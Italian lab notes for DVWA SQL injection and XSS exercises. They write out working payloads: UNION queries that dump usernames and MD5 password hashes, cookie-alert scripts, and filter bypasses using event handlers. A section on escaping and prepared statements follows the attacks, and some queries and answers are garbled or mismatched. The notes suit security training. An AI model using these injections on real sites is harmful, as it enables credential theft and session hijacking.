# Laboratorio 6

10.10.15.4/dvwa/security.php

login: admin

password: password

# Exercise #1: SQL injection warmup (security low)

SQL injection è una tecnica di code injection che sfrutta le vulnerabilità nell'interfaccia tra applicazioni Web e server di database. La vulnerabilità è presente quando
gli input  dell'utente non vengono controllati correttamente all'interno delle applicazioni Web prima di essere inviati al back- server di database finali. Molte applicazioni Web accettano input dagli utenti e quindi li utilizzano input per costruire query SQL, in modo che le applicazioni Web possano ottenere informazioni da
Banca dati. L'obiettivo di questa attività è familiarizzare con l'iniezione SQL giocando
con la primissima (e semplice) iniezione per recuperare tutti gli utenti nel database.

1' or 1=1#

First name: admin   Surname:admin
First name: Gordon   Surname:Brown
First name: Hack   Surname:Me
First name: Pablo  Surname:Pucasso
First name: Bob   Surname:smith

spiegazione: questo stato è sempre vero quindi ritorna tutta la tabella

# Exercise #2: Information leak (security low)

SQL injection è fondamentalmente una tecnica attraverso la quale gli aggressori possono eseguire le proprie
istruzioni SQL dannose generalmente indicate come payload dannoso. Attraverso i malicious SQL statements, gli aggressori possono rubare informazioni dal database delle vittime. L'obiettivo di
questa attività è di ottenere informazioni sulle tabelle del database e sul server di hosting (ad es. in esecuzione SO o nome host macchina).

1’ UNION select 1, version()#        stampa il numero di versione del server MySQL in esecuzione 

La funzione MySQL user()stampa lo  user name attuale e l’host  da cui è  partita la connessione SQL

1’ UNION select 1, user()#
L’utente SQL usato dall’applicazione  DVWA è root. Il database è ospitato sullo stesso host dall’applicazione 

1’ UNION select 1, table_name!!FROM information_schema.tables!!WHERE table_schema = ‘dvwa’#!

Otteniamo le due tabelle guestbook e  users

# Exercise #3: Steal account credentials (security low)

La memorizzazione delle credenziali dell'account in un database è sempre un punto cruciale, le password dovrebbero essere sempre hashed, quindi se un hacker li ruba attraverso un'inkection SQL, sarebbero ancora
protette. Con l'ultimo esercizio hai scoperto alcuni nomi di tabelle, puoi individuare
informazioni sulle password degli account? Quale algoritmo di crittografia viene utilizzato?
Extra 3.1: se lo desideri, puoi provare ad accedere come utente arbitrario aggiornando la password
di un determinato account con il tuo hash preferito; ma ricorda che nel mondo reale questo
apporta modifiche irreversibili al database, inoltre la tua attività potrebbe essere registrata
da qualche parte.

ID: 1' union select 1, password from users #
First name: admin
Surname: admin

ID: 1' union select 1, password from users #
First name: 1
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

ID: 1' union select 1, password from users #
First name: 1
Surname: e99a18c428cb38d5f260853678922e03

ID: 1' union select 1, password from users #
First name: 1
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

ID: 1' union select 1, password from users #
First name: 1
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

# Exercise #4: Read arbitrary file (security low)

In linguaggio SQL (con la giusta funzione) è possibile leggere un file e restituirlo come una stringa. Come hacker possiamo provare a leggere un file dal sistema remoto. Il file che siamo
sempre alla ricerca è ovviamente il passwd in cui erano archiviati i sistemi Linux più vecchi
Le password. È possibile stampare con un'injection SQL il file della password?

ID: 1' union select 1, concat(user_id,  ' : ' , first_name,  ' : ' , last_name,  user, ' : ',  password) from users #
First name: admin
Surname: admin

ID: 1' union select 1, concat(user_id,  ' : ' , first_name,  ' : ' , last_name,  user, ' : ',  password) from users #
First name: 1
Surname: 1 : admin : adminadmin : 5f4dcc3b5aa765d61d8327deb882cf99

ID: 1' union select 1, concat(user_id,  ' : ' , first_name,  ' : ' , last_name,  user, ' : ',  password) from users #
First name: 1
Surname: 2 : Gordon : Browngordonb : e99a18c428cb38d5f260853678922e03

ID: 1' union select 1, concat(user_id,  ' : ' , first_name,  ' : ' , last_name,  user, ' : ',  password) from users #
First name: 1
Surname: 3 : Hack : Me1337 : 8d3533d75ae2c3966d7e0d4fcc69216b

ID: 1' union select 1, concat(user_id,  ' : ' , first_name,  ' : ' , last_name,  user, ' : ',  password) from users #
First name: 1
Surname: 4 : Pablo : Picassopablo : 0d107d09f5bbe40cade3de5c71e9e9b7

ID: 1' union select 1, concat(user_id,  ' : ' , first_name,  ' : ' , last_name,  user, ' : ',  password) from users #
First name: 1
Surname: 5 : Bob : Smithsmithy : 5f4dcc3b5aa765d61d8327deb882cf99

# Exercise #5: Countermeasure

Il problema fondamentale della vulnerabilità dell'SQL injection  è la mancata di separazione del codice
dai dati. Quando si costruisce un'istruzione SQL, il programma (ad esempio il programma PHP) lo sa
quale parte sono i dati e quale parte è il codice. Sfortunatamente, quando viene inviata l'istruzione SQL
il database, il confine è scomparso. Nella parte inferiore della pagina Web è possibile visualizzare
il codice sorgente PHP, con quel codice in mente puoi descriverlo in poche parole in un modo
evitare il problema di iniezione SQL?

L’applicazione costruisce un comando SQL utilizzando un input esterno e non neutralizza(o lo fa in modoerrato)  caratterispecialidel linguaggi SQL

Possiamo implementare un filtro dei caratteri speciali SQL. linguaggi dinamici forniscono già funzioni filtro pronte e robuste. Ad esempio, in PHP: mysql_real_escape_string()

Il filtro inibisce le iniezioni basate su apici. Purtroppo esistono anche iniezioni con argomenti interi (che non fanno uso di apici). Ad esempio, l’input: 1 OR 1=1 è OK per il filtro. Conseguenza: vengono stampati tutti i  record  della tabella

Attivando la script security a livello “high”, lo script sql (abusato fin ora) quota l’argomento $id nella query
Il quoting dell’argomento annulla il significato semantico dell’operatore OR, che viene visto come una semplice stringa

La mitigazione più potente consiste nell’uso di prepared statement. Si tratta di uno strumento per l’esecuzione efficiente e sicura di query SQL 

Viene preparato un template per le query- Tale modello,  contenente il carattere ? al posto dei parametri, viene inviato al server SQL una sola volta. Il server SQL compila la query parametrizzata e la  memorizza senza eseguirla Il client lega i parametri formali a valori concreti e li  invia al server  SQL (anche più volte). Il server inserisce i parametri nell’oggetto compilato ed esegue la query 

L’uso di prepared statement protegge da attacchi basatisu SQL Injection. Motivo: La separazione tra istruzioni SQL e dati evita che istruzioni malevole entrino a far parte del template. Di conseguenza, i dati sono manipolati al di fuori delle istruzioni SQL

# Exercise #6: XSS warmup (security low)

Un XSS consente a un utente malintenzionato di inserire uno script nel contenuto di un sito Web o di un'app. Quando l'utente visita la pagina infetta, lo script verrà eseguito nel browser della vittima. Questo permette
agli aggressori di rubare informazioni private come cookie, informazioni sull'account o per eseguire operazioni personalizzate mentre impersonano l'identità della vittima.
Sotto XSS reflected puoi trovare una semplice pagina web, il tuo obiettivo per questa sezione è quello di
creare un URL che, quando viene cliccato, visualizza il cookie della vittima in un avviso.

Analizzando il codice sorgente si può notare come non ci sia alcun controllo in input sulla variabile $_GET[‘name’]:

<script>alert(document.cookie)</script>

security=low;
PHPSESSID= 2bba2db1ea9a60702ff9b91dddb59b4c

# Exercise #7: Advanced XSS reflected (security medium)

Niente più dettagli, puoi fare lo stesso di prima con il livello di sicurezza DVWA impostato su
medium? Per verificare una possibile vulnerabilità XSS, è necessario testare ogni punto dell'input dell'utente per vedere se puoi inserire codice HTML e JavaScript e se viene consegnato all'output di pagina.

Extra 7.1, puoi fare lo stesso di prima con il livello di sicurezza DVWA impostato su high?


no con medium e high non è più possibile usare <script>alert(document.cookie)</script> 

con il livello medium viene filtrata dalla stringa <script>
con medium <img src=”#” onclick=alert(document.cookie) >
non è possibile filtrare questo elemento

no con high non è possibile, tutto JavaScript verrà bloccato perché il codice rimuoverà il modello "<s * c * r * i * p * t". Dato che non possiamo iniettare alcun codice che inizia con il tag <script>, possiamo usare eventi HTML per l'iniezione di codice poiché non ci sarà alcun tag <script> incluso. 

# Exercise #8: Simple blog post (security low)

Un utente malintenzionato utilizza XSS memorizzato per iniettare contenuto dannoso (payload), molto spesso JavaScript codice, nell'applicazione di destinazione. Se non è presente alcuna convalida dell'input, questo codice dannoso è memorizzato in modo permanente (persistente) dall'applicazione di destinazione. Quando una vittima apre la pagina Web in un browser, il payload di attacco XSS viene pubblicato nel browser della vittima come parte di il codice HTML. Ciò significa che le vittime finiranno per eseguire lo script malevolo una volta che la pagina viene visualizzata nel loro browser. L'obiettivo di questa attività è quello di iniettare codice dannoso che fa apparire il cookie per ogni utente che visita la pagina Web.

mettendo nel campo message <script>alert(document.cookie)</script>
Poiché si tratta di un attacco XSS memorizzato, questo sarà persistente fino alla cancellazione del Guestbook. ogni volta che un utente visita questa scheda, il suo ID di sessione verrà visualizzato in un avviso

# Exercise #9: Avoiding sanitization (security medium)

Impostare il livello di sicurezza su medio e provare a fare lo stesso di prima. Con la sicurezza impostata su
medio, una certa sanificazione dei campi di input viene eseguita dopo aver inviato la posta al server. Il tuo
l'obiettivo è bypassare la sanificazione al fine di memorizzare correttamente XSS nel database.

Con medium non funziona più.
Usiamo il tag body per iniettare la stringa. evito di mettere script
<body onload=alert("XSS")>